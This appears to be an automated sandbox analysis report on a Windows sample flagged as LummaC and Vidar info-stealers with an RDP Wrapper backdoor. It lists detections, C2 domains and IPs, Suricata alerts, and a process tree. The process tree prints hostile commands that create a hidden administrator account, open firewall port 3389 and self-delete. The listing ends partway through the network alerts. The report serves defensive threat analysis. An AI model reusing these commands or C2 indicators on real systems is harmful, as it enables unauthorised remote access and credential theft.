Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1519882
MD5:	252a19a2ffc2aaee5ed5d3f84ba30d38
SHA1:	7f4772d99549926dc85744656e339d8aea46a414
SHA256:	6335282918d5ab79ed7704a1dc655915f829c435997e31d20780d6eda030a440
Tags:	exeuser-Bitsight
Infos:

Detection

LummaC, RDPWrap Tool, LummaC Stealer, Vidar

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Antivirus detection for dropped file

Found malware configuration

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected AntiVM3

Yara detected LummaC Stealer

Yara detected Powershell download and execute

Yara detected Vidar

Yara detected Vidar stealer

.NET source code contains potential unpacker

.NET source code contains very large array initializations

.NET source code references suspicious native API functions

AI detected suspicious sample

Adds a new user with administrator rights

Allocates memory in foreign processes

Allows multiple concurrent remote connection

C2 URLs / IPs found in malware configuration

Contains functionality to inject code into remote processes

Enables remote desktop connection

Found many strings related to Crypto-Wallets (likely being stolen)

Injects a PE file into a foreign processes

LummaC encrypted strings found

Machine Learning detection for dropped file

Modifies the windows firewall

Sample uses string decryption to hide its real strings

Searches for specific processes (likely to inject)

Sigma detected: Outbound RDP Connections Over Non-Standard Tools

Sigma detected: RDP Sensitive Settings Changed

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to harvest and steal Bitcoin Wallet information

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Uses netsh to modify the Windows network and firewall settings

Writes to foreign memory regions

Yara detected Costura Assembly Loader

Yara detected RDPWrap Tool

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to detect sandboxes (mouse cursor move detection)

Contains functionality to dynamically determine API calls

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to record screenshots

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Creates or modifies windows services

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Downloads executable code via HTTP

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Drops PE files to the windows directory (C:\Windows)

Enables debug privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Modifies existing windows services

PE / OLE file has an invalid certificate

PE file contains sections with non-standard names

Queries information about the installed CPU (vendor, model number etc)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Execution of Suspicious File Type Extension

Sigma detected: New User Created Via Net.EXE

Spawns drivers

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

file.exe (PID: 2064 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 252A19A2FFC2AAEE5ED5D3F84BA30D38)

conhost.exe (PID: 1056 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

RegAsm.exe (PID: 2828 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

EBAAFCAFCB.exe (PID: 1296 cmdline: "C:\ProgramData\EBAAFCAFCB.exe" MD5: 47697A60A96C5ADEF362D8DA9A274B7D)

conhost.exe (PID: 4920 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

RegAsm.exe (PID: 1056 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

RegAsm.exe (PID: 5040 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

KECGDBFCBK.exe (PID: 6772 cmdline: "C:\ProgramData\KECGDBFCBK.exe" MD5: F73186DF5A030CF7F186B0737C3AF1F7)

conhost.exe (PID: 1568 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

RegAsm.exe (PID: 3040 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

JKEHIIJJEC.exe (PID: 1892 cmdline: "C:\ProgramData\JKEHIIJJEC.exe" MD5: 3FCBAACCA9CC6DCCF0649F5ABB8B73EB)

cmd.exe (PID: 2796 cmdline: "cmd.exe" /c net user MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 5304 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

net.exe (PID: 4924 cmdline: net user MD5: 31890A7DE89936F922D44D677F681A7F)

net1.exe (PID: 6060 cmdline: C:\Windows\system32\net1 user MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)

cmd.exe (PID: 5444 cmdline: "cmd.exe" /c "C:\Users\user\AppData\Local\Temp\RDPWInst.exe" -i MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 608 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

RDPWInst.exe (PID: 1000 cmdline: C:\Users\user\AppData\Local\Temp\RDPWInst.exe -i MD5: C213162C86BB943BCDF91B3DF381D2F6)

netsh.exe (PID: 512 cmdline: netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)

cmd.exe (PID: 5888 cmdline: "cmd.exe" /c net user RDPUser_2490c46d ToN8BxpWb7YJ /add MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 1728 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

net.exe (PID: 568 cmdline: net user RDPUser_2490c46d ToN8BxpWb7YJ /add MD5: 31890A7DE89936F922D44D677F681A7F)

net1.exe (PID: 7000 cmdline: C:\Windows\system32\net1 user RDPUser_2490c46d ToN8BxpWb7YJ /add MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)

cmd.exe (PID: 500 cmdline: "cmd.exe" /c net localgroup MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 2832 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

net.exe (PID: 6828 cmdline: net localgroup MD5: 31890A7DE89936F922D44D677F681A7F)

net1.exe (PID: 5496 cmdline: C:\Windows\system32\net1 localgroup MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)

cmd.exe (PID: 3804 cmdline: "cmd.exe" /c netsh advfirewall firewall add rule name="RDP" dir=in action=allow protocol=tcp localport=3389 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 6360 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

netsh.exe (PID: 5836 cmdline: netsh advfirewall firewall add rule name="RDP" dir=in action=allow protocol=tcp localport=3389 MD5: 4E89A1A088BE715D6C946E55AB07C7DF)

cmd.exe (PID: 2456 cmdline: "cmd.exe" /c net localgroup "Administrators" RDPUser_2490c46d /add MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 5900 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

net.exe (PID: 6880 cmdline: net localgroup "Administrators" RDPUser_2490c46d /add MD5: 31890A7DE89936F922D44D677F681A7F)

net1.exe (PID: 6052 cmdline: C:\Windows\system32\net1 localgroup "Administrators" RDPUser_2490c46d /add MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)

cmd.exe (PID: 4580 cmdline: "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\EBAAFCAFCBKF" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 4068 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

timeout.exe (PID: 1912 cmdline: timeout /t 10 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)

rdpvideominiport.sys (PID: 4 cmdline: MD5: 77FF15B9237D62A5CBC6C80E5B20A492)

rdpdr.sys (PID: 4 cmdline: MD5: 64991B36F0BD38026F7589572C98E3D6)

tsusbhub.sys (PID: 4 cmdline: MD5: CC6D4A26254EB72C93AC848ECFCFB4AF)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/ https://censys.com/a-beginners-guide-to-hunting-open-directories/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Name	Description	Attribution	Blogpost URLs	Link
Vidar	Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.	No Attribution	https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/ https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/vidar-stealer-h-and-m-campaign https://0xtoxin.github.io/malware%20analysis/Vidar-Stealer-Campaign/ https://asec.ahnlab.com/en/22932/	https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: LummaC

{"C2 url": ["drawzhotdog.shop", "reinforcenh.shop", "stogeneratmns.shop", "fragnantbui.shop", "ghostreedmnu.shop", "wallkedsleeoi.shop", "offensivedzvju.shop", "gutterydhowi.shop", "vozmeatillu.shop"], "Build id": "H8NgCl--"}

Threatname: Vidar

{"C2 url": ["https://steamcommunity.com/profiles/76561199780418869"], "Botnet": "6c8ce6f422a1d9cf34f23d1c2168e754"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_Vidar_2	Yara detected Vidar	Joe Security

Dropped Files

Source	Rule	Description	Author
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\66f5de72d9ebd_rdp[1].exe	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
C:\ProgramData\JKEHIIJJEC.exe	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
C:\Users\user\AppData\Local\Temp\RDPWInst.exe	JoeSecurity_RDPWrapTool	Yara detected RDPWrap Tool	Joe Security
C:\Users\user\AppData\Local\Temp\RDPWInst.exe	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000017.00000000.2112865515.0000000000401000.00000020.00000001.01000000.0000000F.sdmp	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security
00000009.00000002.2052126229.0000000003CE5000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
00000010.00000002.2514195438.0000000002481000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0000000C.00000002.2162685267.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
00000003.00000002.2126523047.000000000104B000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000010.00000000.2081801810.00000000000A2000.00000002.00000001.01000000.0000000C.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000003.00000002.2123509648.00000000005A1000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000017.00000002.2150209183.0000000000401000.00000020.00000001.01000000.0000000F.sdmp	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security
00000000.00000002.1436795595.0000000003AF5000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000000.00000002.1436795595.0000000003AF5000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
00000003.00000002.2123509648.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000003.00000002.2123509648.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
00000017.00000000.2112949311.0000000000450000.00000002.00000001.01000000.0000000F.sdmp	JoeSecurity_RDPWrapTool	Yara detected RDPWrap Tool	Joe Security
00000017.00000002.2150421257.0000000000450000.00000002.00000001.01000000.0000000F.sdmp	JoeSecurity_RDPWrapTool	Yara detected RDPWrap Tool	Joe Security
Process Memory Space: file.exe PID: 2064	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: file.exe PID: 2064	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: file.exe PID: 2064	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: RegAsm.exe PID: 2828	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: RegAsm.exe PID: 2828	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: RegAsm.exe PID: 2828	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: RegAsm.exe PID: 2828	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: RegAsm.exe PID: 3040	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: RegAsm.exe PID: 3040	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: JKEHIIJJEC.exe PID: 1892	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: RDPWInst.exe PID: 1000	JoeSecurity_RDPWrapTool	Yara detected RDPWrap Tool	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
Click to see the 21 entries

Unpacked PEs

Source	Rule	Description	Author
16.0.JKEHIIJJEC.exe.a0000.0.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
12.2.RegAsm.exe.400000.0.raw.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
12.2.RegAsm.exe.400000.0.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
3.2.RegAsm.exe.400000.2.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
3.2.RegAsm.exe.400000.2.unpack	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
0.2.file.exe.3af5570.2.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
0.2.file.exe.3af5570.2.unpack	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
0.2.file.exe.3af5570.2.raw.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
0.2.file.exe.3af5570.2.raw.unpack	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
3.2.RegAsm.exe.400000.2.raw.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
3.2.RegAsm.exe.400000.2.raw.unpack	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
23.0.RDPWInst.exe.400000.0.unpack	JoeSecurity_RDPWrapTool	Yara detected RDPWrap Tool	Joe Security
23.0.RDPWInst.exe.400000.0.unpack	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security
23.2.RDPWInst.exe.400000.0.unpack	JoeSecurity_RDPWrapTool	Yara detected RDPWrap Tool	Joe Security
23.2.RDPWInst.exe.400000.0.unpack	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security
Click to see the 10 entries

Sigma Signatures

System Summary

Sigma detected: Outbound RDP Connections Over Non-Standard Tools

Source: Network Connection

Author: Markus Neis: Data: DestinationIp: 8.46.123.33, DestinationIsIpv6: false, DestinationPort: 3389, EventID: 3, Image: C:\ProgramData\JKEHIIJJEC.exe, Initiated: true, ProcessId: 1892, Protocol: tcp, SourceIp: 192.168.2.8, SourceIsIpv6: false, SourcePort: 49764

Sigma detected: RDP Sensitive Settings Changed

Source: Registry Key set

Author: Samir Bousseaden, David ANDRE, Roberto Rodriguez @Cyb3rWard0g, Nasreddine Bencherchali: Data: Details: %ProgramFiles%\RDP Wrapper\rdpwrap.dll, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\RDPWInst.exe, ProcessId: 1000, TargetObject: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDll

Sigma detected: Execution of Suspicious File Type Extension

Source: Process started

Author: Max Altgelt (Nextron Systems): Data: Command: , CommandLine: , CommandLine|base64offset|contains: , Image: C:\Windows\System32\drivers\rdpvideominiport.sys, NewProcessName: C:\Windows\System32\drivers\rdpvideominiport.sys, OriginalFileName: C:\Windows\System32\drivers\rdpvideominiport.sys, ParentCommandLine: , ParentImage: , ParentProcessId: -1, ProcessCommandLine: , ProcessId: 4, ProcessName: rdpvideominiport.sys

Sigma detected: New User Created Via Net.EXE

Source: Process started

Author: Endgame, JHasenbusch (adapted to Sigma for oscd.community): Data: Command: net user RDPUser_2490c46d ToN8BxpWb7YJ /add, CommandLine: net user RDPUser_2490c46d ToN8BxpWb7YJ /add, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\net.exe, NewProcessName: C:\Windows\SysWOW64\net.exe, OriginalFileName: C:\Windows\SysWOW64\net.exe, ParentCommandLine: "cmd.exe" /c net user RDPUser_2490c46d ToN8BxpWb7YJ /add, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 5888, ParentProcessName: cmd.exe, ProcessCommandLine: net user RDPUser_2490c46d ToN8BxpWb7YJ /add, ProcessId: 568, ProcessName: net.exe

Sigma detected: Local Accounts Discovery

Source: Process started

Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: net user, CommandLine: net user, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\net.exe, NewProcessName: C:\Windows\SysWOW64\net.exe, OriginalFileName: C:\Windows\SysWOW64\net.exe, ParentCommandLine: "cmd.exe" /c net user, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 2796, ParentProcessName: cmd.exe, ProcessCommandLine: net user, ProcessId: 4924, ProcessName: net.exe

Sigma detected: Net.exe Execution

Source: Process started

Author: Michael Haag, Mark Woan (improvements), James Pemberton / @4A616D6573 / oscd.community (improvements): Data: Command: net user, CommandLine: net user, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\net.exe, NewProcessName: C:\Windows\SysWOW64\net.exe, OriginalFileName: C:\Windows\SysWOW64\net.exe, ParentCommandLine: "cmd.exe" /c net user, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 2796, ParentProcessName: cmd.exe, ProcessCommandLine: net user, ProcessId: 4924, ProcessName: net.exe

Suricata Signatures

ET JA3 Hash - [Abuse.ch] Possible Dridex

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T01:49:13.280471+0200	2028765	3	Unknown Traffic	192.168.2.8	49711	5.75.211.162	443	TCP
2024-09-27T01:49:14.428065+0200	2028765	3	Unknown Traffic	192.168.2.8	49712	5.75.211.162	443	TCP
2024-09-27T01:49:15.786891+0200	2028765	3	Unknown Traffic	192.168.2.8	49713	5.75.211.162	443	TCP
2024-09-27T01:49:17.144656+0200	2028765	3	Unknown Traffic	192.168.2.8	49714	5.75.211.162	443	TCP
2024-09-27T01:49:18.485568+0200	2028765	3	Unknown Traffic	192.168.2.8	49715	5.75.211.162	443	TCP
2024-09-27T01:49:19.954689+0200	2028765	3	Unknown Traffic	192.168.2.8	49716	5.75.211.162	443	TCP
2024-09-27T01:49:21.029579+0200	2028765	3	Unknown Traffic	192.168.2.8	49717	5.75.211.162	443	TCP
2024-09-27T01:49:23.952433+0200	2028765	3	Unknown Traffic	192.168.2.8	49718	5.75.211.162	443	TCP
2024-09-27T01:49:25.030299+0200	2028765	3	Unknown Traffic	192.168.2.8	49719	5.75.211.162	443	TCP
2024-09-27T01:49:26.246700+0200	2028765	3	Unknown Traffic	192.168.2.8	49720	5.75.211.162	443	TCP
2024-09-27T01:49:27.350167+0200	2028765	3	Unknown Traffic	192.168.2.8	49721	5.75.211.162	443	TCP
2024-09-27T01:49:29.128110+0200	2028765	3	Unknown Traffic	192.168.2.8	49722	5.75.211.162	443	TCP
2024-09-27T01:49:30.797488+0200	2028765	3	Unknown Traffic	192.168.2.8	49723	5.75.211.162	443	TCP
2024-09-27T01:49:32.493876+0200	2028765	3	Unknown Traffic	192.168.2.8	49724	5.75.211.162	443	TCP
2024-09-27T01:49:33.967528+0200	2028765	3	Unknown Traffic	192.168.2.8	49725	5.75.211.162	443	TCP
2024-09-27T01:49:35.320314+0200	2028765	3	Unknown Traffic	192.168.2.8	49726	5.75.211.162	443	TCP
2024-09-27T01:49:38.919895+0200	2028765	3	Unknown Traffic	192.168.2.8	49727	5.75.211.162	443	TCP
2024-09-27T01:49:40.307093+0200	2028765	3	Unknown Traffic	192.168.2.8	49728	5.75.211.162	443	TCP
2024-09-27T01:49:41.923117+0200	2028765	3	Unknown Traffic	192.168.2.8	49729	5.75.211.162	443	TCP
2024-09-27T01:49:43.432581+0200	2028765	3	Unknown Traffic	192.168.2.8	49730	5.75.211.162	443	TCP
2024-09-27T01:49:45.419609+0200	2028765	3	Unknown Traffic	192.168.2.8	49731	5.75.211.162	443	TCP
2024-09-27T01:49:47.414295+0200	2028765	3	Unknown Traffic	192.168.2.8	49733	5.75.211.162	443	TCP
2024-09-27T01:49:50.206670+0200	2028765	3	Unknown Traffic	192.168.2.8	49735	5.75.211.162	443	TCP
2024-09-27T01:49:52.292205+0200	2028765	3	Unknown Traffic	192.168.2.8	49738	5.75.211.162	443	TCP
2024-09-27T01:49:54.439787+0200	2028765	3	Unknown Traffic	192.168.2.8	49741	5.75.211.162	443	TCP
2024-09-27T01:49:56.165662+0200	2028765	3	Unknown Traffic	192.168.2.8	49745	5.75.211.162	443	TCP
2024-09-27T01:50:25.541071+0200	2028765	3	Unknown Traffic	192.168.2.8	49756	5.75.211.162	443	TCP
2024-09-27T01:50:27.046941+0200	2028765	3	Unknown Traffic	192.168.2.8	49757	5.75.211.162	443	TCP
2024-09-27T01:50:28.394320+0200	2028765	3	Unknown Traffic	192.168.2.8	49758	5.75.211.162	443	TCP
2024-09-27T01:50:29.973772+0200	2028765	3	Unknown Traffic	192.168.2.8	49759	5.75.211.162	443	TCP
2024-09-27T01:50:31.504607+0200	2028765	3	Unknown Traffic	192.168.2.8	49760	5.75.211.162	443	TCP
2024-09-27T01:50:33.226900+0200	2028765	3	Unknown Traffic	192.168.2.8	49761	5.75.211.162	443	TCP
2024-09-27T01:50:34.242406+0200	2028765	3	Unknown Traffic	192.168.2.8	49762	5.75.211.162	443	TCP
2024-09-27T01:50:37.349196+0200	2028765	3	Unknown Traffic	192.168.2.8	49766	5.75.211.162	443	TCP
2024-09-27T01:50:38.462415+0200	2028765	3	Unknown Traffic	192.168.2.8	49767	5.75.211.162	443	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T01:49:51.165765+0200	2054653	1	A Network Trojan was detected	192.168.2.8	49736	104.21.36.139	443	TCP
2024-09-27T01:49:52.082515+0200	2054653	1	A Network Trojan was detected	192.168.2.8	49737	172.67.132.32	443	TCP
2024-09-27T01:49:53.067649+0200	2054653	1	A Network Trojan was detected	192.168.2.8	49739	188.114.96.3	443	TCP
2024-09-27T01:49:54.049802+0200	2054653	1	A Network Trojan was detected	192.168.2.8	49740	188.114.96.3	443	TCP
2024-09-27T01:49:55.118125+0200	2054653	1	A Network Trojan was detected	192.168.2.8	49742	188.114.96.3	443	TCP
2024-09-27T01:49:56.165330+0200	2054653	1	A Network Trojan was detected	192.168.2.8	49744	104.21.58.182	443	TCP
2024-09-27T01:49:57.208296+0200	2054653	1	A Network Trojan was detected	192.168.2.8	49746	188.114.97.3	443	TCP
2024-09-27T01:49:58.147555+0200	2054653	1	A Network Trojan was detected	192.168.2.8	49748	188.114.97.3	443	TCP
2024-09-27T01:49:59.225507+0200	2054653	1	A Network Trojan was detected	192.168.2.8	49749	104.21.77.130	443	TCP
2024-09-27T01:50:01.807899+0200	2054653	1	A Network Trojan was detected	192.168.2.8	49752	104.21.2.13	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T01:49:51.165765+0200	2049836	1	A Network Trojan was detected	192.168.2.8	49736	104.21.36.139	443	TCP
2024-09-27T01:49:52.082515+0200	2049836	1	A Network Trojan was detected	192.168.2.8	49737	172.67.132.32	443	TCP
2024-09-27T01:49:53.067649+0200	2049836	1	A Network Trojan was detected	192.168.2.8	49739	188.114.96.3	443	TCP
2024-09-27T01:49:54.049802+0200	2049836	1	A Network Trojan was detected	192.168.2.8	49740	188.114.96.3	443	TCP
2024-09-27T01:49:55.118125+0200	2049836	1	A Network Trojan was detected	192.168.2.8	49742	188.114.96.3	443	TCP
2024-09-27T01:49:56.165330+0200	2049836	1	A Network Trojan was detected	192.168.2.8	49744	104.21.58.182	443	TCP
2024-09-27T01:49:57.208296+0200	2049836	1	A Network Trojan was detected	192.168.2.8	49746	188.114.97.3	443	TCP
2024-09-27T01:49:58.147555+0200	2049836	1	A Network Trojan was detected	192.168.2.8	49748	188.114.97.3	443	TCP
2024-09-27T01:49:59.225507+0200	2049836	1	A Network Trojan was detected	192.168.2.8	49749	104.21.77.130	443	TCP
2024-09-27T01:50:01.807899+0200	2049836	1	A Network Trojan was detected	192.168.2.8	49752	104.21.2.13	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (drawzhotdog .shop in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T01:49:55.596548+0200	2056157	1	Domain Observed Used for C2 Detected	192.168.2.8	49744	104.21.58.182	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (fragnantbui .shop in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T01:49:56.763724+0200	2056155	1	Domain Observed Used for C2 Detected	192.168.2.8	49746	188.114.97.3	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (ghostreedmnu .shop in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T01:49:52.589108+0200	2056163	1	Domain Observed Used for C2 Detected	192.168.2.8	49739	188.114.96.3	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (gutterydhowi .shop in TLS SNI)

